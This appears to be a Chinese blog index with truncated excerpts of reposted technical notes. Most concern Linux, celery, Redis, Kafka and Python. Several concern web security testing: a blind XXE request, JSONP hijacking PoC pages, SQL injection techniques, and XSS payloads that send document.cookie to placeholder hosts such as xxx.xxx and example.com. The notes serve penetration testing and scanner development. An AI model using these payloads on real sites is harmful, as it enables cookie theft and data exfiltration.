- 博客(105)
- 收藏
- 关注
RSS订阅转载 linux多jdk切换环境
临时更改export JAVA_HOME="/opt/soft/jdk/jdk1.8.0_66"export JRE_HOME="$JAVA_HOME/jre"newCLASSPATH=$(echo $(echo ${PATH} | awk -F ':' '{for(i=1;i<=NF;i++)if($i!~/java\/lib/ && $i!~/jre\/l...
2019-09-25 18:09:00
217
转载 celery timeout的拦截
0X01 场景celery任务超时报错,想查看是传入哪一类数据运行时导致的超时(哪一个插件),但是该报错难以拦截。[2019-06-30 17:23:21,070: ERROR/MainProcess] Task tasks.sum[8c81398b-4378-401d-a674-a3bd3418ccde] raised unexpected: TimeLimitExceeded(5...
2019-09-24 21:00:00
829
转载 chrome开启headless模式以及代理
google-chrome-stable --disable-gpu --remote-debugging-port=9222 --headless -remote-debugging-address=0.0.0.0 --disable-xss-auditor --no-sandbox --disable-web-securityself.browser = self.loop.run...
2019-09-06 11:38:00
947
转载 python 单引号与双引号的转义
import simplejsona = """{"a":"\\""}"""b = """{"a":"\\'"}"""print simplejson.loads(a)print simplejson.loads(b)输出:{'a': '"'}simplejson.errors.JSONDecodeError: Invalid \X escape sequence '\...
2019-08-30 12:37:00
2035
转载 celery指定任务执行时间
有业务线提出需求:要求对于其流量,只能在0点到7点扫描。对此,celery发送任务到队列时可以指定执行的时间。当worker收到任务后,判断还未到执行时间,会存储在worker中,在到达时候后再执行。如果还未执行就中断worker,则任务会重新打回celery队列中,不担心丢失。所以只需要传入time格式的具体执行时间就行。Demoimport datetimedef ...
2019-08-23 00:47:00
1086
转载 XSS测试
在于 alert(123);$(function(){});alert(123); alert(123);alert(123); posted @ 2019-08-22 16:38 huim 阅读(...) 评论(...) 编辑 收藏 ...
2019-08-22 16:38:00
296
转载 redis危险命令
KEYS单行遍历,速度很慢很占执行时间,对单核来说,极有可能导致执行完后处理不过来这段时间堆积的任务量,导致雪崩。FLUSHALLFLUSHDBCONFIG今晚搜索kombu用的key,用了keys命令,dba夺命call,并顺便被科普了一下新闻 php工程师执行redis keys * 导致数据库宕机!血的教训。。所幸不是订单这类业务,是扫描器对内服务。。转载于:h...
2019-08-20 01:29:00
324
转载 kombu在redis中的键值名
参考flower源码取队列名,发送到求数量的函数中queue_names = ControlHandler.get_active_queue_names()queues = yield broker.queues(queue_names)queues函数:SEP = '\x06\x16'DEFAULT_PRIORITY_STEPS = [0, 3, 6, 9]def ...
2019-08-20 01:20:00
172
转载 blind XXE payload
简单验证POST /test HTTP/1.1Content-Type: application/soap+xmlUser-Agent: scannerAccept: */*Cache-Control: no-cacheHost: 域名Content-Length: 142Connection: close<?xml version="1.0" encoding...
2019-08-19 17:04:00
550
转载 mvn打包
mvn assembly:assembly原来三个月前我是这样打包的来回打包了三个小时,看到Java都烦了,最后在百度时看到这行命令转载于:https://www.cnblogs.com/huim/p/11328511.html...
2019-08-09 17:17:00
99
转载 confluent_kafka消费时内存泄漏
confluent_kafka测试的内存泄漏的条件多线程消费centos6预测和centos6底层库存在关系。换用centos7(我是换了7.3)就行了。(起初以为是代码问题,定位问题位置后来回测试才想到是confluent_kafka和centos版本有问题)转载于:https://www.cnblogs.com/huim/p/11132395.html...
2019-07-04 14:48:00
752
转载 内网端口映射+dnslog
以前的DNSLOG部署在公网上也即自己的服务器上,产品依赖个人的环境不是很好。于是做了修改。框架细节1)A域名的域名服务器指向B域名ns0.B.comns1.B.com2)B域名的两个ns0 与 ns1 作A记录到公网的IP上3)公网通过VIP的方式将公网IP的53端口流量映射到内网服务器的任意端口(最好在一千端口以上,因为绑定1000以下端口需要root权限)...
2019-07-02 21:13:00
352
转载 python MySQL安装依赖报错的坑
0X01 问题MySQL-python是python调用MySQL的常用库通常安装时会遇到某些坑。EnvironmentError: mysql_config not foundyum -y install mysql-develgcc报错yum install gcc libffi-devel python-devel openssl-devel一般这样就OK了(装了六七...
2019-07-01 15:00:00
164
转载 扫描QPS控制——celery任务分多队列运行
发包QPS控制,有两个难点。1. redis交互流量的限制。假设每分钟有1000条流量任务生成,每条跑20个插件,每个插件发5个数据包,每分钟约发十万请求。那么在发包处做QPS会遇到一个问题,如果每次发包时先问一下redis“这条流量在不在QPS限定范围内?如果在,这一秒这一分钟的QPS是否已经达到上限不能发送了?如果没达到我就发送顺便redis这个域名当前秒发送量也+1”,...
2019-06-19 21:45:00
264
转载 JSONP劫持
发出空refer的POC<!DOCTYPE html><html><head><meta name="referrer" content="never"></head><body><script>function asd(json){ alert(JSON.stringify(j...
2019-06-11 20:47:00
114
转载 谈CSRF与JSONP设置header问题
关于前端发起请求问题一 JS发起请求的方式方法一JS代码中发起请求的方式普遍为AJAX该技术在 1998 年前后得到了应用。允许客户端脚本发送HTTP请求(XMLHTTP)方法二script标签请求方法三通过HTML的方法通过js自动在jsp中创建一个form表单,并给其method属性为postfunction post(URL, PARAMS) { ...
2019-06-11 20:41:00
936
转载 mysql group_concat长度限制
group_concat函数有长度限制查找当前数据库长度show variables like 'group_concat_max_len' 设置当前session的group_concat长度,其他session连接不受影响SET SESSION group_concat_max_len = 10240;设置全局group_concat长度SET GLOBAL group_...
2019-05-21 10:20:00
175
转载 python redis分布式锁改进
0X01 python redis分布式锁通用方法REDIS分布式锁实现的方式:SETNX + GETSET使用Redis SETNX 命令实现分布式锁python 版本实现上述思路(案例1)Redis分布式锁的python实现但是,流通的代码 redis锁中有BUG,有考虑不周的点。0X02 时间戳变为str形式time.time() > cls.rdcon...
2019-05-15 11:42:00
160
转载 pycharm分辨率&清晰度
三个月前换了新电脑,安装pycharm。又换了新的大屏幕。pycharm界面拖到大屏上时,字大小和字体都没有变化,清晰度低了很多,就像打了一层薄薄的马赛克一样。拖回到原本的屏幕又清晰了。一直以为是这个屏幕和系统的不和谐,直到要写java,装了idea。大家都是兄弟,idea很清晰,pycharm很模糊。搜索了一下setting-->Appearance&Behavi...
2019-05-09 18:23:00
2431
转载 SQL注入——知表名不知列明情景下查询数据
场景有某些情况,可以查找到表名,但查找不到列名。MySQL < 5 或 web过滤 information_scema详解select `1` from (select 1,2,3,4,5,6,7,8,9,10,11,12,13 union select * from 表名)a limit 1,1子查询中select的数目为列数。通过列数 1,2,3... 再union...
2019-04-28 11:52:00
724
转载 idea+scala sdk + scala插件
0X01 前言我的主语言是python,说起java,想起了大二(三年前)上课时教过,课程设计的时候曾经做过个俄罗斯方块,后面其他设计copy代码读懂代码(再后面的课设就用python了)。本次涉及到大数据团队给出的代码,java + scala + flink。考虑到一些小的需求、设计改动、数据对接,一提一沟通一写一联调这一过程需要几天,这样的过程有好多次,自己做会快点。于是开始面...
2019-04-26 08:46:00
664
转载 注入技巧与案例
0X01 注入into outfile钟爱tomcat注入1. 钟爱tomcat注入tomcat+jsp+mysqltomcat需要system或root权限,这种情况一般mysql为root,jsp没有GPC转义。场景:注入+fileprev,但没有网站物理路径现在开始mang后台路径/var/www如果已知 tomcat路径,读取 conf/server.xml读...
2019-04-24 10:47:00
136
转载 xss 加载远程第三方JS
script没有调用远程平台,用web接收cookie<script>window.open('http://xxx.xxx/cookie.asp?msg='+document.cookie)</script>简单的script链接远程第三方js,省略协议,浏览器自动加载当前页面的协议<script src=//xxx.xxx/a.js>...
2019-04-24 08:57:00
1247
转载 python kafka权限校验client.id
kafka集群有权限校验,在连接时需要加入client.id。但pykafka不能配置该选项。搜索了一下,需要使用confluent-kafka链接: https://blog.csdn.net/lanyang123456/article/details/80639625#coding:utf-8from confluent_kafka import Consumer, Ka...
2019-04-08 20:51:00
612
转载 扫描器需求——产品的核心目标
今天晚上讨论下个季度扫描器的需求。0x01 要重构么?重构前提扫描器可读性较差,当初理解的时候看了一两天理解了大致的流程。之后在写功能的过程中,又在一些地方卡住了。另一方面,是代码耦合性太高了,程序运行依靠redis、celery、管理平台的任务功能、插件下载平台,和其他东西耦合性过高,无法单独抽出来,在第三方服务器或者外部服务器部署。想要向业界开源,拆分模块化和降低耦合性又...
2019-04-04 00:44:00
196
转载 【转】Apache与Tomcat有什么关系和区别
【原文链接:https://www.cnblogs.com/zangdalei/p/8057325.html】Apache和Tomcat都是web网络服务器,两者既有联系又有区别,在进行HTML、PHP、JSP、Perl等开发过程中,需要准确掌握其各自特点,选择最佳的服务器配置。 Apache是web服务器(静态解析,如HTML),tomcat是java应用服务...
2019-04-01 22:48:00
102
转载 sql预编译&动态语句静态语句
https://www.cnblogs.com/micrari/p/7112781.htmlhttps://www.cnblogs.com/MarsDing/p/9871703.htmlhttps://blog.csdn.net/lzl_avery/article/details/82771459转载于:https://www.cnblogs.com/huim/p/10637...
2019-04-01 17:46:00
267
转载 json劫持payload
<html><head>jsonp hijacking</head><body><script> function jj(json){ alert(JSON.stringify(json)); }</script><script src="https...
2019-03-26 17:16:00
356
转载 传家宝式思维导图
从大二就开始接触思维导图,这是第一个入门就学习的效率方法,那时候用了很多,后来被markdown代替了,因为建立一个一个mind文件太麻烦了。markdown用久了,也有不方便的地方,不够符合逻辑,不够形象,划分不开思路。终于开始要规划设计一个项目了,要考虑的点太多。写好了需求文档,写设计文档,有点懵逼。写文档最头疼的就是word一写就是好多页,翻上翻下,思路不清晰不说,看着...
2019-02-14 03:06:00
206
转载 django模板中获取域名地址
获取域名:{{ request.get_host }}获取路径:{{ request.path }}获取协议{{ request.scheme }}转载于:https://www.cnblogs.com/huim/p/10268336.html
2019-01-14 18:18:00
358
转载 项目之初的模型设计与status状态字段
0X01开始做一个app的时候,要先做的是流程设计与数据库模型设计。但做的模型设计往往是设置字段满足当前的需求,缺乏足够的经验,即使为以后的功能预留出位置,也无法考虑周全。比如,刚开始做用户表,关于删除用户的功能,一开始预想的是直接删除用户。等到所有功能做完了,这一个版本结束了,在下一个版本迭代中,想要给数据库添加一个删除status字段,删除的时候改status=0,用于标...
2018-12-22 11:45:00
405
转载 python 单行写法
if not any([_ in fingers for _ in finger_ids])转载于:https://www.cnblogs.com/huim/p/10109002.html
2018-12-12 16:13:00
226
转载 xsspayload
元素on事件:prompt(document.cookie)document.location= "http://www.example.com/cookie_catcher.php?c=" + document.cookieconsole.log(document.cookie)alert(document.cookie)<img src="xxx" o...
2018-12-06 16:22:00
217
转载 golang map 读写锁与深度拷贝的坑
0X01golang中,map(字典)无法并发读写简单来说,新建万条线程对同一个map又读又写,会报错。为此,最好加锁,其实性能影响并不明显。type taskCache struct{ sync.RWMutex data map[string] interface{}}0X02golang中,map(字典)为引用拷贝。...
2018-12-05 22:16:00
1253
转载 即将脱坑的感慨
如何开始一个小点呢?最近在做去重,有两方面,URL去重与漏洞去重。关于去重,情况过于复杂。URL去重,这是第一版,用正则进行mysql的匹配,删除匹配到的URL剩余一条。这样要写的规则实在是太多了,如何提高效率,提高规则编写、测试、删除、更新的效率又是一个问题。这些又大多是在规则编写的过程中逐渐形成自动化。漏洞去重,要求同一条漏洞不重复五次。本来是对URL去重做第二版,但...
2018-11-28 21:11:00
85
转载 mysql 正则表达式问号
MySQL 中,用正则表达式匹配?,需要使用两个转义字符 \\?因使用一个被坑了很久。转载于:https://www.cnblogs.com/huim/p/9932267.html
2018-11-08 21:48:00
356
转载 datatables隐藏列与createdRow渲染bootstrapSwitch形成的BUG
背景:昨天写了一个页面用于规则库的增删改查。数据使用datatables渲染,后端返回数据由前端进行一次性渲染和分页。隐藏列:排序的ID不展示,但是排序又想按照ID来排,所以把ID单独作为一列,按照ID列排序,再隐藏掉。//排序部分"order": [[0, "asc"]],//隐藏部分"columnDefs": [ { "visi...
2018-11-07 17:13:00
558
转载 datatables出现横向滚动条
datatables会扩大表单的宽度,设置为table-responsive 自适应的时候则会出现滚动条。转载于:https://www.cnblogs.com/huim/p/9917866.html
2018-11-06 20:38:00
919
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人